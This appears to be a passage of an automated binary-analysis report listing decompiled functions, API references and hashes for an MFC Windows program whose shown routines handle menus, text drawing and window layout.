0x0041e69e
0x0041e69f
0x0041e6a6
0x0041e6a9
0x0041e6b8
0x0041e6be
0x0041e6cc
0x0041e6d3
0x0041e6e5
0x0041e6ea
0x0041e6f5
0x0041e6fc
0x0041e6ff
0x0041e70d
0x0041e71c
0x0041e730
0x0041e742
0x0041e74a
0x0041e752
0x0041e760
0x0041e766
0x0041e769
0x0041e770
0x0041e773
0x0041e775
0x0041e77b
0x0041e77e
0x00000000
0x0041e77e
0x0041e783

APIs

#3293.MFC42(00000000,?,00000000), ref: 0041E68E
GetDC.USER32(?), ref: 0041E698
#2859.MFC42(00000000), ref: 0041E69F
GetTextMetricsA.GDI32(?,?), ref: 0041E6B8
GetDeviceCaps.GDI32(?,00000008), ref: 0041E6CC
GetDeviceCaps.GDI32(?,0000005A), ref: 0041E6E8
GetDeviceCaps.GDI32(?,0000005A), ref: 0041E6F5
ReleaseDC.USER32 ref: 0041E70D
GetDeviceCaps.GDI32(?,0000000A), ref: 0041E718
GetDeviceCaps.GDI32(?,00000008), ref: 0041E722
SetRect.USER32 ref: 0041E730
GetDeviceCaps.GDI32(?,?), ref: 0041E773

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$#2859#3293MetricsRectReleaseText
String ID:
API String ID: 131969298-0
Opcode ID: cbd26ca350c02e425b3c77559175e03b7b7afcb298512a1be14116897e63f423
Instruction ID: 236ed24cbcb7c8f7216e1196d6defd9d4b8508f34d1c82560fec07fd9ed88f9e
Opcode Fuzzy Hash: cbd26ca350c02e425b3c77559175e03b7b7afcb298512a1be14116897e63f423
Instruction Fuzzy Hash: A8314A71600604AFDB14DFA8CD85E9ABBF5FF88300F018529F94A9B6A0D771E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00401771, Relevance: 18.1, APIs: 12, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00401771(void* __ecx) {
				void* _t28;
				int _t29;
				struct HWND__* _t30;
				signed int _t36;
				void* _t49;
				signed int _t58;
				void* _t62;

				L004269E6();
				_push(__ecx);
				_t36 =  *(_t62 + 0xc);
				_t49 = __ecx;
				_t28 = 0x80c83b00;
				 *((intOrPtr*)(__ecx + 0xb4)) = 1;
				if((_t36 & 0x00000004) != 0) {
					_t28 = 0x80c83300;
				}
				_push(0);
				_push( *((intOrPtr*)(_t62 + 8)));
				_push(__imp__#5484);
				_push(_t28);
				_push(__imp__#6412);
				_push(0);
				_push(0);
				L004265C4();
				if(_t28 != 0) {
					asm("sbb esi, esi");
					_t58 = ( ~(_t36 & 0x00005000) & 0x0000f000) + 0x00002000 | _t36 & 0x00000040;
					_t29 = GetSystemMenu( *(_t49 + 0x20), 0);
					_push(_t29);
					L0042635A();
					 *(_t62 - 0x10) = _t29;
					L00425E08();
					_push(0xf011);
					 *(_t62 - 4) = 0;
					L00425E02();
					if(_t29 != 0) {
						DeleteMenu( *( *(_t62 - 0x10) + 4), 0xf060, 0);
						_t29 = AppendMenuA( *( *(_t62 - 0x10) + 4), 0, 0xf060,  *(_t62 + 0xc));
					}
					_push(0xe81f);
					_push(_t58 | 0x50000000);
					_push( *((intOrPtr*)(_t62 + 8)));
					L004265BE();
					if(_t29 != 0) {
						if(_t49 != 0) {
							_t30 =  *(_t49 + 0x20);
						} else {
							_t30 = 0;
						}
						_push(SetParent( *(_t49 + 0xf0), _t30));
						L00426372();
						_push(1);
						_pop(0);
					} else {
					}
					 *(_t49 + 0xb4) =  *(_t49 + 0xb4) & 0x00000000;
					 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
					L00425DFC();
					_t28 = 0;
				} else {
					 *(_t49 + 0xb4) = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t28;
			}

0x00411869
0x0041186e
0x00411870
0x00411875
0x00411877
0x0041187f
0x00411889
0x0041188b
0x0041188b
0x00411894
0x00411895
0x00411898
0x0041189e
0x0041189f
0x004118a5
0x004118a6
0x004118a7
0x004118ae
0x004118c5
0x004118d5
0x004118dd
0x004118e3
0x004118e4
0x004118ec
0x004118ef
0x004118f4
0x004118fc
0x004118ff
0x00411906
0x00411915
0x00411927
0x00411927
0x00411933
0x00411938
0x0041193f
0x00411942
0x00411949
0x00411951
0x00411957
0x00411953
0x00411953
0x00411953
0x00411967
0x00411968
0x0041196d
0x0041196f
0x0041194b
0x0041194b
0x00411970
0x00411977
0x0041197e
0x00411983
0x004118b0
0x004118b0
0x004118b0
0x0041198b
0x00411993

APIs

_EH_prolog.MSVCRT ref: 00411869
#2151.MFC42(00000000,00000000,80C83B00,?,00000000), ref: 004118A7
GetSystemMenu.USER32(?,00000000,00000000,00000000,80C83B00,?,00000000), ref: 004118DD
#2863.MFC42(00000000), ref: 004118E4
#540.MFC42(00000000), ref: 004118EF
#4160.MFC42(0000F011,00000000), ref: 004118FF
DeleteMenu.USER32(?,0000F060,00000000,0000F011,00000000), ref: 00411915
AppendMenuA.USER32 ref: 00411927
#2088.MFC42(?,?,0000E81F,0000F011,00000000), ref: 00411942
SetParent.USER32(?,?), ref: 00411961
#2864.MFC42(00000000), ref: 00411968
#800.MFC42(00000000), ref: 0041197E

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#2088#2151#2863#2864#4160#540#800AppendDeleteH_prologParentSystem
String ID:
API String ID: 3395426809-0
Opcode ID: 6f951176df43abb84ab0a7ca89f6f0d6d4a6248218fd0b69f11c3dcb785fcde9
Instruction ID: 50d9fc90dc6e62bd0db6bdd4c4df08a74ec2e7672af895ac1c5911e459836303
Opcode Fuzzy Hash: 6f951176df43abb84ab0a7ca89f6f0d6d4a6248218fd0b69f11c3dcb785fcde9
Instruction Fuzzy Hash: B931F572700525BBDB109F64DC55BEEBB69FF08354F41812AFA2997161D7389D00C798

Uniqueness

Uniqueness Score: -1.00%

Function 00401A73, Relevance: 18.1, APIs: 12, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00401A73(intOrPtr __ecx) {
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t53;
				void* _t55;

				L004269E6();
				_push(__ecx);
				_t53 = __ecx;
				 *((intOrPtr*)(_t55 - 0x10)) = __ecx;
				 *(_t55 - 4) = 0;
				L00426198();
				 *(_t55 - 4) = 1;
				L00425E08();
				 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(_t55 + 8));
				_push(_t55 + 0xc);
				 *(_t55 - 4) = 2;
				 *((intOrPtr*)(__ecx)) = 0x42ca24;
				L00426054();
				_t31 =  *((intOrPtr*)(_t55 + 0x10));
				_push(0);
				_push(0x3f);
				_push(1);
				_push(0);
				 *((intOrPtr*)(__ecx + 0x28)) = _t31;
				L00426192();
				_push(0x18);
				L00425E38();
				 *((intOrPtr*)(_t55 + 8)) = _t31;
				 *(_t55 - 4) = 3;
				if(_t31 == 0) {
					_t31 = 0;
				} else {
					_push(1);
					_push(__ecx);
					L0042618C();
				}
				_push(0x44);
				 *(_t55 - 4) = 2;
				 *((intOrPtr*)(_t53 + 0x18)) = _t31;
				L00425E38();
				_t42 = _t31;
				 *((intOrPtr*)(_t55 + 8)) = _t42;
				 *(_t55 - 4) = 4;
				if(_t42 == 0) {
					_t31 = 0;
				} else {
					_push(0);
					_push(0x1000);
					_push(1);
					_push( *((intOrPtr*)(_t53 + 0x18)));
					L00426186();
				}
				_push(0x44);
				 *(_t55 - 4) = 2;
				 *((intOrPtr*)(_t53 + 0x1c)) = _t31;
				L00425E38();
				_t44 = _t31;
				 *((intOrPtr*)(_t55 + 8)) = _t44;
				 *(_t55 - 4) = 5;
				if(_t44 == 0) {
					_t31 = 0;
				} else {
					_push(0);
					_push(0x1000);
					_push(0);
					_push( *((intOrPtr*)(_t53 + 0x18)));
					L00426186();
				}
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t53 + 0x20)) = _t31;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return _t53;
			}

0x0040b029
0x0040b02e
0x0040b031
0x0040b034
0x0040b039
0x0040b03c
0x0040b044
0x0040b04a
0x0040b054
0x0040b05a
0x0040b05b
0x0040b05f
0x0040b065
0x0040b06a
0x0040b06d
0x0040b06e
0x0040b070
0x0040b072
0x0040b075
0x0040b078
0x0040b07d
0x0040b07f
0x0040b085
0x0040b08a
0x0040b08e
0x0040b09c
0x0040b090
0x0040b090
0x0040b092
0x0040b095
0x0040b095
0x0040b09e
0x0040b0a0
0x0040b0a4
0x0040b0a7
0x0040b0ad
0x0040b0af
0x0040b0b4
0x0040b0bd
0x0040b0cd
0x0040b0bf
0x0040b0bf
0x0040b0c0
0x0040b0c1
0x0040b0c3
0x0040b0c6
0x0040b0c6
0x0040b0cf
0x0040b0d1
0x0040b0d5
0x0040b0d8
0x0040b0de
0x0040b0e0
0x0040b0e5
0x0040b0e9
0x0040b0f8
0x0040b0eb
0x0040b0eb
0x0040b0ec
0x0040b0ed
0x0040b0ee
0x0040b0f1
0x0040b0f1
0x0040b0fa
0x0040b101
0x0040b104
0x0040b111
0x0040b119

APIs

_EH_prolog.MSVCRT ref: 0040B029
#523.MFC42 ref: 0040B03C
#540.MFC42 ref: 0040B04A
#858.MFC42(?), ref: 0040B065
#2077.MFC42(00000000,00000001,0000003F,00000000,?), ref: 0040B078
#823.MFC42(00000018,00000000,00000001,0000003F,00000000,?), ref: 0040B07F
#524.MFC42(?,00000001,00000000,00000001,0000003F,00000000,?), ref: 0040B095
#823.MFC42(00000044,00000000,00000001,0000003F,00000000,?), ref: 0040B0A7
#273.MFC42(?,00000001,00001000,00000000,00000000,00000001,0000003F,00000000,?), ref: 0040B0C6
#823.MFC42(00000044,00000000,00000001,0000003F,00000000,?), ref: 0040B0D8
#273.MFC42(?,00000000,00001000,00000000,00000000,00000001,0000003F,00000000,?), ref: 0040B0F1
#800.MFC42(00000000,00000001,0000003F,00000000,?), ref: 0040B104

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823$#273$#2077#523#524#540#800#858H_prolog
String ID:
API String ID: 536292281-0
Opcode ID: 9628f5ecbc0b7b78b27e9e89623a5a28b81efae0c198c39c4d1bd64d23dea17b
Instruction ID: fbbfc68a4c477f479ea8b0aa9b474a59c7d2de4b3bb393433801a74f001adf21
Opcode Fuzzy Hash: 9628f5ecbc0b7b78b27e9e89623a5a28b81efae0c198c39c4d1bd64d23dea17b
Instruction Fuzzy Hash: F731C470B01354EADB14DF79D8857AFBAE4AB04304F50842FB159A72C2CBB89A448759

Uniqueness

Uniqueness Score: -1.00%

Function 004021B2, Relevance: 18.1, APIs: 12, Instructions: 77
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004021B2(void* __ecx, void* __edx) {
				void* _t36;
				int _t38;
				void* _t44;
				void* _t58;
				struct HICON__* _t60;
				void* _t63;
				void* _t65;

				_t58 = __edx;
				L004269E6();
				_t63 = __ecx;
				_push(__ecx);
				L00426558();
				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
				GetClientRect( *(__ecx + 0x20), _t65 - 0x1c);
				_push( *((intOrPtr*)(_t63 + 0x98)));
				_push(_t65 - 0x1c);
				L004264C8();
				_push(1);
				_push(_t65 - 0x1c);
				L00426834();
				InflateRect(_t65 - 0x1c, 0, 2);
				_t36 = _t63 + 0x80;
				_push(_t36);
				L0042667E();
				_push( *((intOrPtr*)(_t63 + 0x9c)));
				_t44 = _t36;
				L00426672();
				_t38 = DrawTextA( *(_t65 - 0x6c),  *(_t63 + 0x88), 0xffffffff, _t65 - 0x1c, 0xa210);
				_t60 =  *(_t63 + 0x94);
				if(_t60 != 0) {
					asm("cdq");
					_t38 = DrawIcon( *(_t65 - 0x6c),  *((intOrPtr*)(_t65 - 0x14)) -  *((intOrPtr*)(_t63 + 0xa0)),  *((intOrPtr*)(_t65 - 0x10)) -  *((intOrPtr*)(_t63 + 0xa4)) - _t58 >> 1, _t60);
				}
				if(_t44 != 0) {
					_push(_t44);
					L0042667E();
				}
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				L00426552();
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t38;
			}

0x004021b2
0x0041de14
0x0041de1e
0x0041de21
0x0041de25
0x0041de2a
0x0041de35
0x0041de3b
0x0041de47
0x0041de48
0x0041de50
0x0041de52
0x0041de55
0x0041de62
0x0041de68
0x0041de71
0x0041de72
0x0041de77
0x0041de80
0x0041de82
0x0041de9c
0x0041dea2
0x0041deaa
0x0041debf
0x0041dec9
0x0041dec9
0x0041ded1
0x0041ded3
0x0041ded7
0x0041ded7
0x0041dedc
0x0041dee3
0x0041deee
0x0041def6

APIs

_EH_prolog.MSVCRT ref: 0041DE14
#470.MFC42 ref: 0041DE25
GetClientRect.USER32 ref: 0041DE35
#2754.MFC42(?,?), ref: 0041DE48
#1716.MFC42(?,00000001,?,?), ref: 0041DE55
InflateRect.USER32(?,00000000,00000002), ref: 0041DE62
#5787.MFC42(?), ref: 0041DE72
#6172.MFC42(?,?), ref: 0041DE82
DrawTextA.USER32(?,?,000000FF,?,0000A210), ref: 0041DE9C
DrawIcon.USER32 ref: 0041DEC9
#5787.MFC42(00000000), ref: 0041DED7
#755.MFC42 ref: 0041DEE3

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5787DrawRect$#1716#2754#470#6172#755ClientH_prologIconInflateText
String ID:
API String ID: 3846036329-0
Opcode ID: 21566ca87c659960aa63f89e73d40d168b50397e1f78659c18af1798479a24b5
Instruction ID: f16cd58052a41e163276f9b59121806d235cda51c7ed43984d4f92e3da616124
Opcode Fuzzy Hash: 21566ca87c659960aa63f89e73d40d168b50397e1f78659c18af1798479a24b5
Instruction Fuzzy Hash: 5F217C71A0061AAFCB10EBB4DC85FEEB779FF44304F50452EB166A3191DB38690ACB14

Uniqueness

Uniqueness Score: -1.00%

Function 004014CE, Relevance: 18.1, APIs: 12, Instructions: 77
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004014CE() {
				signed int _t32;
				void* _t35;
				signed short _t38;
				int _t55;
				intOrPtr _t57;
				void* _t61;

				L004269E6();
				_t57 =  *((intOrPtr*)(_t61 + 0x10));
				_t38 = 0;
				if(_t57 == 0 || ( *(_t61 + 0xc) & 0x00000010) == 0) {
					L10:
					_t32 = 0;
				} else {
					_push(2);
					_push(0x26);
					L0042670E();
					_push( *((intOrPtr*)(_t61 + 8)));
					 *(_t61 - 4) = 0;
					_push(1);
					L00426708();
					L00426702();
					L00425E08();
					 *(_t61 - 4) = 1;
					_t55 = GetMenuItemCount( *(_t57 + 4));
					if(_t55 !=  *((intOrPtr*)(_t57 + 0x10))) {
						L0040187F(_t57);
					}
					if(_t55 <= 0) {
						L9:
						 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
						L00425DFC();
						 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
						L00425DFC();
						goto L10;
					} else {
						do {
							_push(0x400);
							_push(_t61 + 0x10);
							_push(_t38);
							_t35 = L00402207(_t57);
							if(_t35 == 0) {
								goto L8;
							} else {
								L00426702();
								_push( *(_t61 + 0xc));
								L004266FC();
								if(_t35 >= 0) {
									 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
									L00425DFC();
									 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
									L00425DFC();
									_t32 = _t38 & 0x0000ffff | 0x00020000;
								} else {
									goto L8;
								}
							}
							goto L11;
							L8:
							_t38 = _t38 + 1;
						} while (_t38 < _t55);
						goto L9;
					}
				}
				L11:
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t32;
			}

0x00416845
0x0041684c
0x0041684f
0x00416854
0x004168f8
0x004168f8
0x00416864
0x00416864
0x00416866
0x0041686b
0x00416870
0x00416876
0x00416879
0x0041687b
0x00416883
0x0041688b
0x00416893
0x0041689d
0x004168a2
0x004168a6
0x004168a6
0x004168ad
0x004168e0
0x004168e0
0x004168e7
0x004168ec
0x004168f3
0x00000000
0x004168af
0x004168af
0x004168b2
0x004168b7
0x004168b8
0x004168bb
0x004168c2
0x00000000
0x004168c4
0x004168c7
0x004168cc
0x004168d2
0x004168d9
0x00416909
0x00416919
0x0041691e
0x00416925
0x0041692a
0x00000000
0x00000000
0x00000000
0x004168d9
0x00000000
0x004168db
0x004168db
0x004168dc
0x00000000
0x004168af
0x004168ad
0x004168fa
0x00416900
0x00416908

APIs

_EH_prolog.MSVCRT ref: 00416845
#536.MFC42(00000026,00000002), ref: 0041686B
#5856.MFC42(00000001,?,00000026,00000002), ref: 0041687B
#4202.MFC42(00000001,?,00000026,00000002), ref: 00416883
#540.MFC42(00000001,?,00000026,00000002), ref: 0041688B
GetMenuItemCount.USER32 ref: 00416897
#4202.MFC42(00000000,?,00000400), ref: 004168C7
#2764.MFC42(?,00000000,?,00000400), ref: 004168D2
#800.MFC42(00000000,?,00000400), ref: 004168E7
#800.MFC42(00000000,?,00000400), ref: 004168F3
#800.MFC42(?,00000000,?,00000400), ref: 00416919
#800.MFC42(?,00000000,?,00000400), ref: 00416925

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#4202$#2764#536#540#5856CountH_prologItemMenu
String ID:
API String ID: 2215035676-0
Opcode ID: 5921559fd90b67eac0438e989084063195ec8b33339ca31a7400099292cc363f
Instruction ID: 9ca7fcf196097ac5cf24c618edb70adfbb01b4a6b3a0be0a73cf390793129c50
Opcode Fuzzy Hash: 5921559fd90b67eac0438e989084063195ec8b33339ca31a7400099292cc363f
Instruction Fuzzy Hash: 3A21F331210228ABDB00EF65D881BEE7760AF0031CF51856EF826A31D2DB78DE05C658

Uniqueness

Uniqueness Score: -1.00%

Function 00401456, Relevance: 18.1, APIs: 12, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401456(void* __ecx, void* __eflags) {
				int _t39;
				int _t40;
				struct HMENU__* _t43;
				struct HMENU__* _t46;
				int _t50;
				void* _t67;
				void* _t69;

				L004269E6();
				_t67 = __ecx;
				L00425E08();
				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
				 *((intOrPtr*)(_t69 - 0x18)) =  *((intOrPtr*)(__ecx + 0x10));
				_t39 = L0040222A(__ecx);
				 *(_t69 - 0x10) =  *(_t69 - 0x10) & 0x00000000;
				_t50 = _t39;
				_t40 = GetMenuItemCount( *(__ecx + 4));
				if(_t50 < _t40) {
					do {
						_t41 =  *(_t69 - 0x10);
						if( *(_t69 - 0x10) <  *((intOrPtr*)(_t69 - 0x18))) {
							_push(_t69 - 0x1c);
							_push(L0040154B( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0xc)) + _t41 * 4))));
							 *(_t69 - 4) = 1;
							L00426054();
							 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
							L00425DFC();
							_t43 = GetSubMenu( *(_t67 + 4), _t50);
							_push(_t43);
							L0042635A();
							if(_t43 != 0) {
								 *( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0xc)) +  *(_t69 - 0x10) * 4)) + 0x10) = 0x410;
								_t46 = GetSubMenu( *(_t67 + 4), _t50);
								_push(_t46);
								L0042635A();
								ModifyMenuA( *(_t67 + 4), _t50, 0x410,  *(_t46 + 4),  *(_t69 - 0x14));
							}
						}
						_t50 = _t50 + 1;
						 *(_t69 - 0x10) =  *(_t69 - 0x10) + 1;
						_t40 = GetMenuItemCount( *(_t67 + 4));
					} while (_t50 < _t40);
				}
				 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return _t40;
			}

0x00415d68
0x00415d72
0x00415d77
0x00415d7f
0x00415d85
0x00415d88
0x00415d90
0x00415d94
0x00415d96
0x00415d9e
0x00415dab
0x00415dab
0x00415db1
0x00415db6
0x00415dc2
0x00415dc6
0x00415dca
0x00415dcf
0x00415dd6
0x00415ddf
0x00415de1
0x00415de2
0x00415de9
0x00415df8
0x00415dff
0x00415e01
0x00415e02
0x00415e17
0x00415e17
0x00415de9
0x00415e20
0x00415e21
0x00415e24
0x00415e2a
0x00415e32
0x00415e33
0x00415e3a
0x00415e44
0x00415e4c

APIs

_EH_prolog.MSVCRT ref: 00415D68
#540.MFC42 ref: 00415D77
GetMenuItemCount.USER32 ref: 00415D96
#858.MFC42(00000000,?), ref: 00415DCA
#800.MFC42(00000000,?), ref: 00415DD6
GetSubMenu.USER32 ref: 00415DDF
#2863.MFC42(00000000), ref: 00415DE2
GetSubMenu.USER32 ref: 00415DFF
#2863.MFC42(00000000), ref: 00415E02
ModifyMenuA.USER32(00000000,00000000,00000410,?,?), ref: 00415E17
GetMenuItemCount.USER32 ref: 00415E24
#800.MFC42 ref: 00415E3A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#2863#800CountItem$#540#858H_prologModify
String ID:
API String ID: 3175700527-0
Opcode ID: 51dba4f9aa4f8a3916298c876b94a85560a2e29a845da247e36ee24ddadc8248
Instruction ID: ee6c11dd13f2d6845b64a5aab09801724672a3b31a38ccd9e9234cbd8c998d6b
Opcode Fuzzy Hash: 51dba4f9aa4f8a3916298c876b94a85560a2e29a845da247e36ee24ddadc8248
Instruction Fuzzy Hash: 5F21A271A00615DFCB10EBA5D985AEFB7B5FF44308F50485EE022A3191CB799E04CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401F50, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00401F50(void* __ecx) {
				void* __esi;
				void* _t89;
				intOrPtr _t93;
				void* _t116;
				intOrPtr* _t125;
				void* _t128;
				void* _t130;

				_t70 = E00428781;
				L004269E6();
				_t128 = __ecx;
				_push(0x8052);
				L00425FB8();
				_push(0x60);
				 *(_t130 - 4) = 0;
				L00425E38();
				 *((intOrPtr*)(_t130 - 0x1c)) = E00428781;
				 *(_t130 - 4) = 1;
				if(E00428781 == 0) {
					_t93 = 0;
					__eflags = 0;
				} else {
					_push(1);
					_push(0x42f1e0);
					_push( *((intOrPtr*)(_t130 + 0xc)));
					_push(0x442174);
					_push(1);
					_t70 = E004018BB(E00428781, E00428781);
					_t93 = E00428781;
				}
				 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
				_push(0x60);
				L00425E38();
				 *((intOrPtr*)(_t130 - 0x1c)) = _t70;
				 *(_t130 - 4) = 2;
				if(_t70 == 0) {
					 *((intOrPtr*)(_t130 - 0x10)) = 0;
				} else {
					_push(0);
					_push( *((intOrPtr*)(_t130 + 0xc)));
					_push(1);
					_push(2);
					_push( *((intOrPtr*)(_t130 - 0x14)));
					_push(2);
					_t70 = E004019D8(_t70);
					 *((intOrPtr*)(_t130 - 0x10)) = _t70;
				}
				 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
				_push(0x60);
				L00425E38();
				 *((intOrPtr*)(_t130 - 0x1c)) = _t70;
				 *(_t130 - 4) = 3;
				if(_t70 == 0) {
